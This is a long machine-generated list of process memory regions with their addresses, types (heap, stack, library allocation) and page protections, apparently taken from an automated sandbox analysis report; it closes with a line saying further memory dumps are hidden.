1E89B8F0000
trusted library allocation
page read and write
207245A6000
heap
page read and write
20724578000
heap
page read and write
18C48A13000
heap
page read and write
7FFAACFE0000
trusted library allocation
page read and write
20724731000
heap
page read and write
7FFAACF10000
trusted library allocation
page read and write
20724689000
heap
page read and write
18C489DD000
heap
page read and write
19F1478000
stack
page read and write
1E89F1FF000
trusted library allocation
page read and write
1E89E5FA000
trusted library allocation
page read and write
1D920FB000
stack
page read and write
207245C6000
heap
page read and write
3E2D1BE000
stack
page read and write
E7ABDBE000
stack
page read and write
7FFAACCB0000
trusted library allocation
page execute and read and write
20724662000
heap
page read and write
33226F9000
stack
page read and write
3E2D5FD000
stack
page read and write
16636800000
heap
page read and write
7FF4B21C0000
trusted library allocation
page execute and read and write
18C48A18000
heap
page read and write
207245A1000
heap
page read and write
1E89B830000
heap
page read and write
E7ABEBB000
stack
page read and write
332277E000
stack
page read and write
207245AC000
heap
page read and write
18C48A20000
heap
page read and write
1C438513000
heap
page read and write
20724696000
heap
page read and write
18C48A24000
heap
page read and write
7FFAACF50000
trusted library allocation
page read and write
1843EE90000
heap
page read and write
18C48A1C000
heap
page read and write
20724589000
heap
page read and write
7FFAACD7A000
trusted library allocation
page read and write
1661C675000
heap
page read and write
33229FA000
stack
page read and write
18C48A02000
heap
page read and write
1E89E544000
trusted library allocation
page read and write
7FFAACD68000
trusted library allocation
page read and write
1C437D13000
heap
page read and write
18C489E4000
heap
page read and write
20724672000
heap
page read and write
1B59E000
stack
page read and write
20724700000
heap
page read and write
7FFAACD20000
trusted library allocation
page read and write
1661EB97000
trusted library allocation
page read and write
17AF6E30000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
1040000
heap
page read and write
1E89E19F000
trusted library allocation
page read and write
224B5500000
heap
page execute and read and write
18C489FD000
heap
page read and write
207245AC000
heap
page read and write
20724691000
heap
page read and write
207245C2000
heap
page read and write
17A812D9000
trusted library allocation
page read and write
20724593000
heap
page read and write
1E89E7E5000
trusted library allocation
page read and write
18C489E0000
heap
page read and write
2072259A000
heap
page read and write
207246DB000
heap
page read and write
E7ABCB8000
stack
page read and write
2A7F000
trusted library allocation
page read and write
20724583000
heap
page read and write
1E8B5773000
heap
page read and write
2072459B000
heap
page read and write
17AF5400000
heap
page read and write
18C48A1C000
heap
page read and write
20722588000
heap
page read and write
18C48A20000
heap
page read and write
18C4B202000
heap
page read and write
BC8000
heap
page read and write
7FFAACFF0000
trusted library allocation
page read and write
7FFAACB90000
trusted library allocation
page read and write
7FFAACEB3000
trusted library allocation
page read and write
7FFAACD62000
trusted library allocation
page read and write
7FFAACBB0000
trusted library allocation
page read and write
18C46AF3000
heap
page read and write
166366F0000
heap
page read and write
2072472F000
heap
page read and write
18C489FC000
heap
page read and write
207245A1000
heap
page read and write
18C48B25000
heap
page read and write
7FFAACC4C000
trusted library allocation
page execute and read and write
20724678000
heap
page read and write
18C48B97000
heap
page read and write
18C46B28000
heap
page read and write
7FFAACCA6000
trusted library allocation
page execute and read and write
2072458E000
heap
page read and write
1661C5F0000
trusted library allocation
page read and write
207245C2000
heap
page read and write
2249B5BC000
heap
page read and write
18C48A18000
heap
page read and write
7FFAACDB0000
trusted library allocation
page execute and read and write
7FFAACDF0000
trusted library allocation
page read and write
18C48B97000
heap
page read and write
18C4B223000
heap
page read and write
E7AB9F7000
stack
page read and write
224B575B000
heap
page read and write
1415000
heap
page read and write
18C48A1C000
heap
page read and write
17AF5470000
trusted library section
page read and write
18C48AF1000
heap
page read and write
207245A6000
heap
page read and write
207245CD000
heap
page read and write
19F1279000
stack
page read and write
C40000
heap
page read and write
4149BCC000
stack
page read and write
1661C670000
heap
page read and write
1C437C5C000
heap
page read and write
7FFAACD80000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
20724682000
heap
page read and write
17A80F76000
trusted library allocation
page read and write
1661C365000
heap
page read and write
2249E401000
trusted library allocation
page read and write
18C48B9B000
heap
page read and write
7FFAACED0000
trusted library allocation
page read and write
7FFAACFB0000
trusted library allocation
page execute and read and write
7FFB22776000
unkown
page readonly
224B5759000
heap
page read and write
18C48A20000
heap
page read and write
3E2D4FF000
stack
page read and write
1E8B59CB000
heap
page read and write
18C48A28000
heap
page read and write
1E8AD716000
trusted library allocation
page read and write
224B5605000
heap
page read and write
18C489FD000
heap
page read and write
18C48A18000
heap
page read and write
20724550000
heap
page read and write
207245BB000
heap
page read and write
3322A78000
stack
page read and write
17AF7290000
heap
page execute and read and write
17AF70A0000
heap
page execute and read and write
19F107E000
stack
page read and write
4149B4E000
stack
page read and write
2A71000
trusted library allocation
page read and write
7FFAACEEA000
trusted library allocation
page read and write
17A80001000
trusted library allocation
page read and write
17AF6EE0000
trusted library allocation
page read and write
207246F8000
heap
page read and write
7FFAACD68000
trusted library allocation
page read and write
18C48A12000
heap
page read and write
207245C2000
heap
page read and write
1C439058000
heap
page read and write
18C48AC7000
heap
page read and write
17A8188F000
trusted library allocation
page read and write
224B5820000
heap
page read and write
2249B700000
heap
page read and write
18C46B5E000
heap
page read and write
207245A1000
heap
page read and write
1E8B585A000
heap
page read and write
7FFB23AE0000
unkown
page readonly
18C48A2C000
heap
page read and write
1CC75000
heap
page read and write
18C489F9000
heap
page read and write
1C57B000
stack
page read and write
1E89B885000
heap
page read and write
4148D7D000
stack
page read and write
207245B6000
heap
page read and write
18C48A1C000
heap
page read and write
7FFAACEA0000
trusted library allocation
page read and write
17A812AA000
trusted library allocation
page read and write
1D916FE000
unkown
page readonly
1C4390C1000
heap
page read and write
1B3CF000
stack
page read and write
17AF5500000
heap
page read and write
18C48AF6000
heap
page read and write
207246F0000
heap
page read and write
1C439104000
heap
page read and write
20722592000
heap
page read and write
7FFAACDC0000
trusted library allocation
page read and write
1661C3F5000
heap
page read and write
18C48A1C000
heap
page read and write
17A81030000
trusted library allocation
page read and write
1E8AD70F000
trusted library allocation
page read and write
20724574000
heap
page read and write
1E8B5AC6000
heap
page read and write
1E89EC8B000
trusted library allocation
page read and write
1C437CC1000
heap
page read and write
1CC9C000
heap
page read and write
224B55DD000
heap
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
1E8B5809000
heap
page read and write
207245A6000
heap
page read and write
7FFAACEF3000
trusted library allocation
page read and write
18C46AFE000
heap
page read and write
207245B6000
heap
page read and write
E7ACB8E000
stack
page read and write
1E8AD796000
trusted library allocation
page read and write
207246FF000
heap
page read and write
1662DFC1000
trusted library allocation
page read and write
7FFAACBDC000
trusted library allocation
page execute and read and write
2249D26A000
trusted library allocation
page read and write
7FFAACB84000
trusted library allocation
page read and write
16636470000
heap
page read and write
7FFAACBD0000
trusted library allocation
page read and write
18C48AE1000
heap
page read and write
7FFAACD22000
trusted library allocation
page read and write
7FFAACEEC000
trusted library allocation
page read and write
1C438C20000
trusted library section
page readonly
1E8B5760000
heap
page read and write
20724689000
heap
page read and write
1E89F224000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
207224F0000
heap
page read and write
1C43D260000
trusted library allocation
page read and write
17AF7130000
heap
page read and write
207245C2000
heap
page read and write
18C489FC000
heap
page read and write
17AF787E000
heap
page read and write
18C48B80000
heap
page read and write
18C48AE9000
heap
page read and write
16636642000
heap
page read and write
7FFAACFBA000
trusted library allocation
page read and write
2249E344000
trusted library allocation
page read and write
7FFAACDB2000
trusted library allocation
page read and write
18C48A00000
heap
page read and write
1E8B59EB000
heap
page read and write
207225A7000
heap
page read and write
17A902F2000
trusted library allocation
page read and write
1D9267E000
stack
page read and write
18C48A13000
heap
page read and write
7FFAACC96000
trusted library allocation
page execute and read and write
7FFAACD3A000
trusted library allocation
page read and write
F4A000
heap
page read and write
18C48B87000
heap
page read and write
207246F8000
heap
page read and write
224B578A000
heap
page read and write
1E8B5960000
heap
page read and write
207245C6000
heap
page read and write
1B68D000
stack
page read and write
2072469C000
heap
page read and write
18C48A12000
heap
page read and write
18C48A0A000
heap
page read and write
18C46AD2000
heap
page read and write
1C095000
stack
page read and write
2072459B000
heap
page read and write
20728BA4000
heap
page read and write
7FFAACBC3000
trusted library allocation
page execute and read and write
17AF6E70000
trusted library allocation
page read and write
1661FD6F000
trusted library allocation
page read and write
207245BE000
heap
page read and write
B70000
heap
page read and write
1B6F3000
heap
page read and write
18C48A00000
heap
page read and write
7FFAACBBD000
trusted library allocation
page execute and read and write
F62000
heap
page read and write
4148C7E000
stack
page read and write
B60000
heap
page read and write
7FFAACE90000
trusted library allocation
page read and write
D8F000
stack
page read and write
18C48B36000
heap
page read and write
18C48B6F000
heap
page read and write
1E89B6AC000
heap
page read and write
207245BE000
heap
page read and write
1E89ECB1000
trusted library allocation
page read and write
18C489EF000
heap
page read and write
1C43D270000
trusted library allocation
page read and write
7FFAACC66000
trusted library allocation
page execute and read and write
E7ACA8E000
stack
page read and write
207246F1000
heap
page read and write
19F0CB3000
stack
page read and write
7FFAACB83000
trusted library allocation
page execute and read and write
2072459B000
heap
page read and write
18C46AFB000
heap
page read and write
F20000
heap
page read and write
18C48B2C000
heap
page read and write
20728BA8000
heap
page read and write
7FFAACBAD000
trusted library allocation
page execute and read and write
1E8AD72D000
trusted library allocation
page read and write
207245B2000
heap
page read and write
BFE000
heap
page read and write
207245BB000
heap
page read and write
18C48A24000
heap
page read and write
1E89B6AA000
heap
page read and write
7FFAACD80000
trusted library allocation
page execute and read and write
19F22CC000
stack
page read and write
17AF71E1000
heap
page read and write
4148E76000
stack
page read and write
17A81783000
trusted library allocation
page read and write
7FFAACF20000
trusted library allocation
page read and write
207245C2000
heap
page read and write
207245AC000
heap
page read and write
224B57E1000
heap
page read and write
207245BA000
heap
page read and write
18C48BA3000
heap
page read and write
7FFAACEF3000
trusted library allocation
page read and write
20724561000
heap
page read and write
7FFAACB80000
trusted library allocation
page read and write
207245BA000
heap
page read and write
7FFAACD40000
trusted library allocation
page execute and read and write
17A80DCC000
trusted library allocation
page read and write
18C489EF000
heap
page read and write
7FFAACBC4000
trusted library allocation
page read and write
18C4B218000
heap
page read and write
18C4AC10000
trusted library allocation
page read and write
1D930FE000
unkown
page readonly
2871000
trusted library allocation
page read and write
18C48A06000
heap
page read and write
18C48A28000
heap
page read and write
20724682000
heap
page read and write
1E89EBA5000
trusted library allocation
page read and write
18C4B218000
heap
page read and write
1C439092000
heap
page read and write
1D924FE000
unkown
page readonly
2072467B000
heap
page read and write
1D9237E000
stack
page read and write
1E89B8D0000
trusted library allocation
page read and write
18C48AEF000
heap
page read and write
414907F000
stack
page read and write
1661F7BB000
trusted library allocation
page read and write
207267A0000
trusted library allocation
page read and write
12CD2000
trusted library allocation
page read and write
1661F29A000
trusted library allocation
page read and write
332230E000
stack
page read and write
2072458B000
heap
page read and write
F00000
trusted library allocation
page read and write
7FFAACE91000
trusted library allocation
page read and write
18C48B9E000
heap
page read and write
7DF462D10000
trusted library allocation
page execute and read and write
18C48A00000
heap
page read and write
207245B6000
heap
page read and write
7FFAACEC0000
trusted library allocation
page read and write
1CB6E000
stack
page read and write
19F13F6000
stack
page read and write
7FFAACDF0000
trusted library allocation
page read and write
3322977000
stack
page read and write
17A810BF000
trusted library allocation
page read and write
224B55E6000
heap
page read and write
2072459B000
heap
page read and write
18C48AF1000
heap
page read and write
1C2DE000
stack
page read and write
18C48A18000
heap
page read and write
7FFAAD016000
trusted library allocation
page read and write
18C48AE3000
heap
page read and write
332287E000
stack
page read and write
17AF6F37000
heap
page execute and read and write
F8F000
heap
page read and write
1D928FE000
unkown
page readonly
25EDBFD000
stack
page read and write
18C489E6000
heap
page read and write
20723FDB000
heap
page read and write
1E89E38C000
trusted library allocation
page read and write
7FFAAD000000
trusted library allocation
page read and write
207245A6000
heap
page read and write
1C437D02000
heap
page read and write
18C489FC000
heap
page read and write
1C43D360000
trusted library allocation
page read and write
7FFAACF7A000
trusted library allocation
page read and write
1E89B890000
heap
page read and write
18C48A1C000
heap
page read and write
7FFAACD62000
trusted library allocation
page read and write
207245B1000
heap
page read and write
1C438C60000
trusted library section
page readonly
2249D020000
heap
page read and write
17AF5502000
heap
page read and write
18C48B2C000
heap
page read and write
7FFAACB83000
trusted library allocation
page execute and read and write
17AF5410000
heap
page read and write
20723F90000
heap
page read and write
18C46970000
heap
page read and write
7FFB22779000
unkown
page readonly
207245B6000
heap
page read and write
1661E45E000
trusted library allocation
page read and write
12CC1000
trusted library allocation
page read and write
2072471D000
heap
page read and write
207225E8000
heap
page read and write
20724589000
heap
page read and write
7FFAACE7F000
trusted library allocation
page read and write
20724676000
heap
page read and write
18C48A18000
heap
page read and write
4148DF8000
stack
page read and write
7FFB1E3C0000
unkown
page read and write
7FFAACFE0000
trusted library allocation
page read and write
1661C2B0000
heap
page read and write
18C48A05000
heap
page read and write
17AF71BF000
heap
page read and write
33238CE000
stack
page read and write
1E8B57B5000
heap
page read and write
7FFAACC0C000
trusted library allocation
page execute and read and write
1661F16C000
trusted library allocation
page read and write
17A810F5000
trusted library allocation
page read and write
18C489E7000
heap
page read and write
1D91DFE000
unkown
page readonly
2072457F000
heap
page read and write
207246FC000
heap
page read and write
207245BA000
heap
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
2249D030000
heap
page read and write
2249E932000
trusted library allocation
page read and write
B8D000
heap
page read and write
207225E9000
heap
page read and write
18C46B2E000
heap
page read and write
207245AC000
heap
page read and write
18C48AC0000
heap
page read and write
1C437C00000
heap
page read and write
207245A6000
heap
page read and write
20724731000
heap
page read and write
1D36B000
stack
page read and write
1E89E383000
trusted library allocation
page read and write
1663672C000
heap
page read and write
18C46B36000
heap
page read and write
18C489F8000
heap
page read and write
7FFB22780000
unkown
page read and write
20728EA2000
trusted library allocation
page read and write
224B5901000
heap
page read and write
2249E198000
trusted library allocation
page read and write
B20000
heap
page read and write
1BB9E000
stack
page read and write
7FFAAD00F000
trusted library allocation
page read and write
18C46B02000
heap
page read and write
25ED97D000
stack
page read and write
2072457E000
heap
page read and write
1C438601000
trusted library allocation
page read and write
224B5626000
heap
page read and write
18C48A2C000
heap
page read and write
2580000
trusted library allocation
page read and write
20724583000
heap
page read and write
1E8AD71D000
trusted library allocation
page read and write
18C48A13000
heap
page read and write
1C439065000
heap
page read and write
207246C5000
heap
page read and write
18C489E4000
heap
page read and write
7FFAACE6F000
trusted library allocation
page read and write
18C48A28000
heap
page read and write
1E8B5792000
heap
page read and write
18C46B06000
heap
page read and write
7FFAACEF0000
trusted library allocation
page read and write
E90000
heap
page read and write
207245A1000
heap
page read and write
18C4B510000
heap
page read and write
207245A1000
heap
page read and write
2249E06E000
trusted library allocation
page read and write
1C43D300000
trusted library allocation
page read and write
20724682000
heap
page read and write
1D923FE000
unkown
page readonly
7FFAACFB0000
trusted library allocation
page execute and read and write
18C46ADB000
heap
page read and write
18C48A28000
heap
page read and write
7FFAACB94000
trusted library allocation
page read and write
7FFAACEA0000
trusted library allocation
page read and write
7FFAACD3A000
trusted library allocation
page read and write
16636440000
heap
page execute and read and write
17AF6E60000
heap
page readonly
7FFAACD31000
trusted library allocation
page read and write
7FFAACB9B000
trusted library allocation
page read and write
2249DFB5000
trusted library allocation
page read and write
207245B2000
heap
page read and write
18C48A20000
heap
page read and write
224B5857000
heap
page read and write
7FFAACDC0000
trusted library allocation
page read and write
18C48A0B000
heap
page read and write
18C48A09000
heap
page read and write
19F157E000
stack
page read and write
B11000
stack
page read and write
207246DB000
heap
page read and write
18C48A0E000
heap
page read and write
1E89B754000
heap
page read and write
4148BFA000
stack
page read and write
1D92CFE000
unkown
page readonly
7FFAACF8E000
trusted library allocation
page read and write
7FFAACB9D000
trusted library allocation
page execute and read and write
207246FC000
heap
page read and write
20724689000
heap
page read and write
1E89B900000
heap
page readonly
B2C000
heap
page read and write
18C48B6F000
heap
page read and write
1E8B59C9000
heap
page read and write
207245A6000
heap
page read and write
2249DECB000
trusted library allocation
page read and write
20724596000
heap
page read and write
7FFAACBB4000
trusted library allocation
page read and write
224B5910000
heap
page read and write
1E89B6A6000
heap
page read and write
18C489EF000
heap
page read and write
2249B5E5000
heap
page read and write
18C48A05000
heap
page read and write
7FFAACFA6000
trusted library allocation
page read and write
7FFAACB84000
trusted library allocation
page read and write
B90000
heap
page read and write
207245B6000
heap
page read and write
7FFAACC1C000
trusted library allocation
page execute and read and write
18C48A24000
heap
page read and write
20722593000
heap
page read and write
7FFAACB84000
trusted library allocation
page read and write
18C48A13000
heap
page read and write
1410000
heap
page read and write
2249B585000
heap
page read and write
20724575000
heap
page read and write
18C46ADC000
heap
page read and write
18C48A18000
heap
page read and write
18C48A01000
heap
page read and write
1661FD94000
trusted library allocation
page read and write
207245AE000
heap
page read and write
18C489F5000
heap
page read and write
7FFAACDA8000
trusted library allocation
page read and write
2870000
heap
page read and write
207245AC000
heap
page read and write
7DF4588D0000
trusted library allocation
page execute and read and write
1D926FE000
unkown
page readonly
16636349000
heap
page read and write
18C46B29000
heap
page read and write
7FFAACBBB000
trusted library allocation
page execute and read and write
18C48B64000
heap
page read and write
207245B6000
heap
page read and write
There are 1890 hidden memdumps, click here to show them.